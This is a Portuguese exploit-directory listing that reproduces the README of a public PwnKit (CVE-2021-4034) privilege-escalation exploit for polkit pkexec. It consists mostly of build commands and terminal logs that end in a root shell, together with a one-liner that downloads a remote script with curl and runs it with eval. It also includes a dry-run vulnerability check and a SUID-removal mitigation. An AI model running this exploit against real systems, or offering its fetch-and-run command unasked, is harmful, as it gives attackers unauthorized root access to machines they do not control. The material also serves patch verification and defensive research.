Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
berdav-CVE-2021-4034 — Exploit para CVE-2021-4034 (PwnKit) que fornece um shell de root via polkit pkexec. Inclui um modo de simulação (dry-run) para testar a vulnerabilidade e um script de uma linha para exploração rápida. | Kitploit
Ferramentas/GitHubGitHub/thejoyofhacking/berdav-cve-2021-4034
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed Teaming
GitHubthejoyofhacking/berdav-cve-2021-4034

berdav-CVE-2021-4034

Exploit para CVE-2021-4034 (PwnKit) que fornece um shell de root via polkit pkexec. Inclui um modo de simulação (dry-run) para testar a vulnerabilidade e um script de uma linha para exploração rápida.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
4há 4 anosAinda não revisado

CVE-2021-4034

Um dia para o exploit de escalonamento de privilégios do polkit

Basta executar make, ./cve-2021-4034 e aproveitar seu shell root.

O advisory original dos autores reais está aqui

PoC

Se o exploit estiver funcionando, você obterá um shell root imediatamente:

root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Atualizar o polkit na maioria dos sistemas corrigirá o exploit, portanto você verá o uso e o programa sairá:

root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$

Dry Run

Para não executar um shell, mas apenas testar se o sistema é vulnerável, compile o alvo dry-run.

Se o programa sair imprimindo "root", isso significa que seu sistema é vulnerável ao exploit.

root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ make dry-run
...
vagrant@ubuntu-impish:~/CVE-2021-4034$ dry-run/dry-run-cve-2021-4034
root
vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
1

Se o seu sistema não for vulnerável, ele imprime um erro e sai.

root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ dry-run/dry-run-cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
0

Sobre o Polkit pkexec para Linux

O Polkit (anteriormente PolicyKit) é um componente para controlar privilégios em todo o sistema em sistemas operacionais do tipo Unix. Ele fornece uma maneira organizada para processos sem privilégios se comunicarem com processos privilegiados. Também é possível usar o polkit para executar comandos com privilégios elevados usando o comando pkexec seguido do comando que se pretende executar (com permissão de root).

Comandos de uma linha

Você pode facilmente explorar o sistema usando um único script, baixável e executável com este comando:

root@kitploit:~
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root

Mitigação

Se não houver patches disponíveis para o seu sistema operacional, você pode remover o bit SUID do pkexec como uma mitigação temporária.

root@kitploit:~
# chmod 0755 /usr/bin/pkexec

O exploit então falhará reclamando que o pkexec deve ter o bit setuid habilitado.

root@kitploit:~
vagrant@ubuntu-impish:/vagrant/CVE-2021-4034$ sudo chmod 0755 /usr/bin/pkexec
vagrant@ubuntu-impish:/vagrant/CVE-2021-4034$ ./cve-2021-4034
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
pkexec must be setuid root
Baixar ferramenta